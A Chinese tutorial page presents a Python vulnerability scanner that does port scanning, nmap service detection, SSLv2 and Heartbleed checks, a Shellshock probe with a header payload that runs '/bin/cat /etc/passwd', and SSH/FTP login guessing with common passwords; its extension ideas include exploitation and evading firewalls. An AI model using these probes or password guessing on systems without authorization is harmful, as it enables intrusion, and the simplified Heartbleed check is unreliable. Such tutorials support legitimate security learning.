当前位置: 首页 > news >正文

Python实例题:Python打造漏洞扫描器

目录

Python实例题

题目

代码实现

实现原理

模块化设计:

多线程扫描:

漏洞检测技术:

关键代码解析

端口扫描功能

Heartbleed 漏洞检测

Shellshock 漏洞检测

使用说明

安装依赖:

基本用法:

扫描常见端口:

扫描指定端口范围:

输出结果到文件:

扩展建议

增强功能:

性能优化:

用户界面:

安全增强:

Python实例题

题目

Python打造漏洞扫描器

代码实现

import socket
import requests
import threading
import time
import nmap
import argparse
import json
from urllib.parse import urlparse
import concurrent.futures
import reclass VulnerabilityScanner:def __init__(self):self.target = ""self.ports = []self.threads = 50self.timeout = 2self.vuln_db = self._load_vulnerability_database()self.results = {"target": "","scan_time": "","open_ports": [],"vulnerabilities": []}def _load_vulnerability_database(self):"""加载漏洞数据库"""vuln_db = {"heartbleed": {"name": "OpenSSL Heartbleed (CVE-2014-0160)","description": "OpenSSL 1.0.1至1.0.1f版本中存在的缓冲区溢出漏洞,允许攻击者读取内存内容。","port": 443,"protocol": "https","check_function": "check_heartbleed"},"shellshock": {"name": "Shellshock (CVE-2014-6271)","description": "Bash环境变量解析漏洞,允许远程执行代码。","port": 80,"protocol": "http","check_function": "check_shellshock"},"sslv2": {"name": "SSLv2支持检测","description": "服务器支持不安全的SSLv2协议,可能导致多种攻击。","port": 443,"protocol": "https","check_function": "check_sslv2"},"weak_password": {"name": "弱密码检测","description": "检测常见服务的弱密码","services": ["ssh", "ftp", "smtp", "telnet"],"check_function": "check_weak_password"}}return vuln_dbdef set_target(self, target):"""设置扫描目标"""self.target = targetself.results["target"] = targetdef set_ports(self, ports):"""设置扫描端口"""if isinstance(ports, int):self.ports = [ports]elif isinstance(ports, list):self.ports = portselif isinstance(ports, str):if '-' in ports:start, end = map(int, ports.split('-'))self.ports = list(range(start, end + 1))else:self.ports = [int(ports)]def set_threads(self, threads):"""设置扫描线程数"""self.threads = threadsdef set_timeout(self, timeout):"""设置连接超时时间"""self.timeout = timeoutdef scan_ports(self):"""扫描目标主机的开放端口"""print(f"[+] 开始扫描目标 {self.target} 的端口...")start_time = time.time()open_ports = []def scan_port(port):try:sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)sock.settimeout(self.timeout)result = sock.connect_ex((self.target, port))if result == 0:open_ports.append(port)service = socket.getservbyport(port) if port < 1024 else "unknown"print(f"[+] 端口 {port} 开放 ({service})")sock.close()except Exception as e:print(f"[-] 扫描端口 {port} 时出错: {e}")with concurrent.futures.ThreadPoolExecutor(max_workers=self.threads) as executor:executor.map(scan_port, self.ports)end_time = time.time()print(f"[+] 端口扫描完成,耗时 {end_time - start_time:.2f} 秒")print(f"[+] 共发现 {len(open_ports)} 个开放端口")self.results["open_ports"] = open_portsself.results["scan_time"] = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())return open_portsdef identify_services(self):"""识别开放端口上的服务"""print(f"[+] 开始识别 {self.target} 上的服务...")nm = nmap.PortScanner()for port in self.results["open_ports"]:try:nm.scan(self.target, str(port), arguments='-sV -Pn')if self.target in nm and port in nm[self.target]['tcp']:service_info = nm[self.target]['tcp'][port]service_name = service_info['name']service_version = service_info.get('version', 'unknown')print(f"[+] 端口 {port}: {service_name} ({service_version})")# 更新结果for port_info in self.results["open_ports"]:if port_info == port:self.results["open_ports"][self.results["open_ports"].index(port_info)] = {"port": port,"service": service_name,"version": service_version}except Exception as e:print(f"[-] 识别端口 {port} 服务时出错: {e}")def check_heartbleed(self, port=443):"""检测Heartbleed漏洞 (CVE-2014-0160)"""print(f"[+] 检测 {self.target}:{port} 是否存在Heartbleed漏洞...")try:# 简化版Heartbleed检测,实际应用中应使用更健壮的检测方法import sslcontext = ssl.create_default_context()context.check_hostname = Falsecontext.verify_mode = ssl.CERT_NONEwith socket.create_connection((self.target, port)) as sock:with context.wrap_socket(sock, server_hostname=self.target) as ssock:# 发送特制的心跳包heartbleed_payload = bytearray([0x18, 0x03, 0x02, 0x00, 0x03, 0x01, 0x40, 0x00])ssock.sendall(heartbleed_payload)response = ssock.recv(1024)# 简单判断:如果响应长度大于预期,则可能存在漏洞if len(response) > 7:print(f"[!] 警告: {self.target}:{port} 可能存在Heartbleed漏洞!")self.results["vulnerabilities"].append({"name": self.vuln_db["heartbleed"]["name"],"description": self.vuln_db["heartbleed"]["description"],"port": port,"severity": "High"})else:print(f"[-] {self.target}:{port} 不存在Heartbleed漏洞")except Exception as e:print(f"[-] 检测Heartbleed漏洞时出错: {e}")def check_shellshock(self, port=80):"""检测Shellshock漏洞 (CVE-2014-6271)"""print(f"[+] 检测 {self.target}:{port} 是否存在Shellshock漏洞...")try:url = f"http://{self.target}:{port}"headers = {"User-Agent": "() { :; }; echo; echo; /bin/cat /etc/passwd"}response = requests.get(url, headers=headers, timeout=self.timeout)# 检查响应中是否包含/etc/passwd内容if re.search(r'root:[x*]:0:0:', response.text):print(f"[!] 警告: {self.target}:{port} 可能存在Shellshock漏洞!")self.results["vulnerabilities"].append({"name": self.vuln_db["shellshock"]["name"],"description": self.vuln_db["shellshock"]["description"],"port": port,"severity": "High"})else:print(f"[-] {self.target}:{port} 不存在Shellshock漏洞")except Exception as e:print(f"[-] 检测Shellshock漏洞时出错: {e}")def check_sslv2(self, port=443):"""检测是否支持不安全的SSLv2协议"""print(f"[+] 检测 {self.target}:{port} 是否支持SSLv2...")try:import sslcontext = ssl.SSLContext(ssl.PROTOCOL_SSLv2)context.check_hostname = Falsecontext.verify_mode = ssl.CERT_NONEtry:with socket.create_connection((self.target, port)) as sock:with context.wrap_socket(sock, server_hostname=self.target) as ssock:print(f"[!] 警告: {self.target}:{port} 支持SSLv2协议!")self.results["vulnerabilities"].append({"name": self.vuln_db["sslv2"]["name"],"description": self.vuln_db["sslv2"]["description"],"port": port,"severity": "Medium"})except ssl.SSLError as e:if "protocol version" in str(e):print(f"[-] {self.target}:{port} 不支持SSLv2协议")else:print(f"[-] 检测SSLv2协议时出错: {e}")except Exception as e:print(f"[-] 检测SSLv2协议时出错: {e}")def check_weak_password(self, service, username="admin", password_list=["admin", "password", "123456"]):"""检测特定服务的弱密码"""print(f"[+] 检测 {self.target} 的 {service} 服务弱密码...")try:if service == "ssh":import paramikofor password in password_list:try:ssh = paramiko.SSHClient()ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())ssh.connect(self.target, username=username, password=password, timeout=self.timeout)print(f"[!] 警告: {self.target} 的SSH服务存在弱密码: {username}/{password}")self.results["vulnerabilities"].append({"name": f"{service}弱密码","description": f"发现{service}服务使用弱密码: {username}/{password}","service": service,"severity": "High"})ssh.close()breakexcept Exception as e:passelif service == "ftp":import ftplibfor password in password_list:try:ftp = ftplib.FTP(self.target)ftp.login(username, password)print(f"[!] 警告: {self.target} 的FTP服务存在弱密码: {username}/{password}")self.results["vulnerabilities"].append({"name": f"{service}弱密码","description": f"发现{service}服务使用弱密码: {username}/{password}","service": service,"severity": "High"})ftp.quit()breakexcept Exception as e:pass# 可以添加更多服务的弱密码检测except Exception as e:print(f"[-] 检测{service}弱密码时出错: {e}")def run_full_scan(self):"""运行完整扫描(端口扫描 + 服务识别 + 漏洞检测)"""print(f"[+] 开始对 {self.target} 进行完整扫描...")# 1. 端口扫描self.scan_ports()# 2. 服务识别self.identify_services()# 3. 漏洞检测for vuln_id, vuln_info in self.vuln_db.items():if vuln_id == "weak_password":# 弱密码检测需要特殊处理for service in vuln_info["services"]:for port_info in self.results["open_ports"]:if isinstance(port_info, dict) and port_info["service"] == service:self.check_weak_password(service)else:# 其他漏洞检测for port_info in self.results["open_ports"]:port = port_info["port"] if isinstance(port_info, dict) else port_infoif port == vuln_info["port"]:check_function = getattr(self, vuln_info["check_function"])check_function(port)# 4. 输出结果self.print_results()return self.resultsdef print_results(self):"""打印扫描结果"""print("\n" + "=" * 50)print(f"扫描结果: {self.target}")print("=" * 50)print("\n[+] 开放端口:")if not self.results["open_ports"]:print("  未发现开放端口")else:for port_info in self.results["open_ports"]:if isinstance(port_info, dict):print(f"  端口 {port_info['port']}: {port_info['service']} ({port_info['version']})")else:print(f"  端口 {port_info}")print("\n[+] 发现的漏洞:")if not self.results["vulnerabilities"]:print("  未发现漏洞")else:for vuln in self.results["vulnerabilities"]:print(f"  - {vuln['name']} (端口: {vuln.get('port', 'N/A')}, 严重程度: {vuln['severity']})")print(f"    {vuln['description']}")print("\n" + "=" * 50)def export_results(self, filename="scan_results.json"):"""导出扫描结果到JSON文件"""try:with open(filename, 'w') as f:json.dump(self.results, f, indent=4)print(f"[+] 扫描结果已导出到 {filename}")except Exception as e:print(f"[-] 导出结果时出错: {e}")def main():parser = argparse.ArgumentParser(description='Python漏洞扫描器')parser.add_argument('-t', '--target', help='目标主机IP或域名', required=True)parser.add_argument('-p', '--ports', help='扫描端口范围,如: 22,80,443 或 1-1000')parser.add_argument('-T', '--threads', help='线程数,默认50', type=int, default=50)parser.add_argument('-o', '--output', help='输出结果文件')args = parser.parse_args()scanner = VulnerabilityScanner()scanner.set_target(args.target)# 设置扫描端口if args.ports:if ',' in args.ports:ports = [int(p.strip()) for p in args.ports.split(',')]scanner.set_ports(ports)elif '-' in args.ports:start, end = map(int, args.ports.split('-'))scanner.set_ports(list(range(start, end + 1)))else:scanner.set_ports(int(args.ports))else:# 默认扫描常见端口common_ports = [21, 22, 23, 25, 53, 80, 110, 143, 443, 465, 587, 993, 995, 3306, 3389, 5432, 8080]scanner.set_ports(common_ports)# 设置线程数if args.threads:scanner.set_threads(args.threads)# 运行完整扫描results = scanner.run_full_scan()# 导出结果if args.output:scanner.export_results(args.output)if __name__ == "__main__":main()    

实现原理

这个漏洞扫描器基于以下核心技术实现:

  • 模块化设计

    • 分离端口扫描、服务识别和漏洞检测功能
    • 支持多种漏洞检测模块
    • 可扩展的漏洞数据库
  • 多线程扫描

    • 使用线程池提高扫描效率
    • 可配置的线程数和超时时间
  • 漏洞检测技术

    • 协议特定检测(如 Heartbleed、SSLv2)
    • 服务弱密码检测
    • 基于 HTTP 头的漏洞检测(如 Shellshock)

关键代码解析

端口扫描功能

def scan_ports(self):print(f"[+] 开始扫描目标 {self.target} 的端口...")def scan_port(port):try:sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)sock.settimeout(self.timeout)result = sock.connect_ex((self.target, port))if result == 0:open_ports.append(port)service = socket.getservbyport(port) if port < 1024 else "unknown"print(f"[+] 端口 {port} 开放 ({service})")sock.close()except Exception as e:print(f"[-] 扫描端口 {port} 时出错: {e}")open_ports = []with concurrent.futures.ThreadPoolExecutor(max_workers=self.threads) as executor:executor.map(scan_port, self.ports)self.results["open_ports"] = open_portsreturn open_ports

Heartbleed 漏洞检测

def check_heartbleed(self, port=443):print(f"[+] 检测 {self.target}:{port} 是否存在Heartbleed漏洞...")try:import sslcontext = ssl.create_default_context()context.check_hostname = Falsecontext.verify_mode = ssl.CERT_NONEwith socket.create_connection((self.target, port)) as sock:with context.wrap_socket(sock, server_hostname=self.target) as ssock:heartbleed_payload = bytearray([0x18, 0x03, 0x02, 0x00, 0x03, 0x01, 0x40, 0x00])ssock.sendall(heartbleed_payload)response = ssock.recv(1024)if len(response) > 7:print(f"[!] 警告: {self.target}:{port} 可能存在Heartbleed漏洞!")self.results["vulnerabilities"].append({"name": "OpenSSL Heartbleed (CVE-2014-0160)","description": "OpenSSL 1.0.1至1.0.1f版本中存在的缓冲区溢出漏洞...","port": port,"severity": "High"})else:print(f"[-] {self.target}:{port} 不存在Heartbleed漏洞")except Exception as e:print(f"[-] 检测Heartbleed漏洞时出错: {e}")

Shellshock 漏洞检测

def check_shellshock(self, port=80):print(f"[+] 检测 {self.target}:{port} 是否存在Shellshock漏洞...")try:url = f"http://{self.target}:{port}"headers = {"User-Agent": "() { :; }; echo; echo; /bin/cat /etc/passwd"}response = requests.get(url, headers=headers, timeout=self.timeout)if re.search(r'root:[x*]:0:0:', response.text):print(f"[!] 警告: {self.target}:{port} 可能存在Shellshock漏洞!")self.results["vulnerabilities"].append({"name": "Shellshock (CVE-2014-6271)","description": "Bash环境变量解析漏洞,允许远程执行代码。","port": port,"severity": "High"})else:print(f"[-] {self.target}:{port} 不存在Shellshock漏洞")except Exception as e:print(f"[-] 检测Shellshock漏洞时出错: {e}")

使用说明

安装依赖

pip install python-nmap requests

基本用法

python vulnerability_scanner.py -t 192.168.1.100 -p 22,80,443

扫描常见端口

python vulnerability_scanner.py -t example.com

扫描指定端口范围

python vulnerability_scanner.py -t 192.168.1.1 -p 1-1000 -T 100

输出结果到文件

python vulnerability_scanner.py -t target.com -o results.json

扩展建议

  • 增强功能

    • 添加更多漏洞检测模块(SQL 注入、XSS 等)
    • 实现漏洞利用功能(需要谨慎使用)
    • 添加 CVE 数据库自动更新功能
  • 性能优化

    • 使用异步 I/O 提高扫描效率
    • 添加智能端口扫描策略
    • 实现扫描结果缓存机制
  • 用户界面

    • 开发 Web 界面
    • 添加进度显示和扫描报告
    • 支持批量扫描和任务管理
  • 安全增强

    • 添加速率限制防止被防火墙拦截
    • 实现扫描伪装技术
    • 增加扫描结果加密功能

相关文章:

  • 【Linux 学习计划】-- 冯诺依曼体系 | 操作系统的概念与定位,以及其如何管理软件
  • svn: E155017: Checksum mismatch while updating 校验错误的解决方法
  • whisper相关的开源项目 (asr)
  • leetcode 17. Letter Combinations of a Phone Number
  • Ubuntu 24.04部署安装Honeyd蜜罐
  • 大学之大:浦项科技大学2025.5.25
  • 塔能科技:以多元技术赋能全行业能耗节能转型
  • STM32 输出比较输出PWM控制呼吸灯小实验(2种实现 铁头山羊与江协科技)
  • 掌阅iReader新形态墨水屏Tango发布:科技与美学共舞,开启灵动阅读新体验
  • HTTP请求全链路剖析:请求头、XHR与状态码的实战指南
  • 8.Java 8 日期时间处理:从 Date 的崩溃到 LocalDate 的优雅自救​
  • ADS学习笔记(二) 交流小信号仿真
  • 2025最新智能优化算法:野燕麦优化算法(Animated Oat Optimization Algorithm, AOO),MATLAB代码
  • HTTP协议版本的发展(HTTP/0.9、1.0、1.1、2、3)
  • 黑马点评-分布式锁Lua脚本
  • 进阶-自定义类型(结构体、位段、枚举、联合)
  • Lua基础语法
  • 在Windows平台基于VSCode准备GO的编译环境
  • Mustache 模板引擎详解_轻量、跨语言、逻辑无关的设计哲学
  • 一文讲透golang channel 的特点、原理及使用场景
  • 为什么用dw做的网站打不开/2021十大网络舆情案例
  • 流媒体网站建设规划 所需设备/网络推广平台软件app
  • 网站开发第三方/国内好的seo
  • 铜川免费做网站/专业黑帽seo
  • 哪个找房网站好/软文推广案例大全
  • 深圳效果好的免费网站建设/seo资料网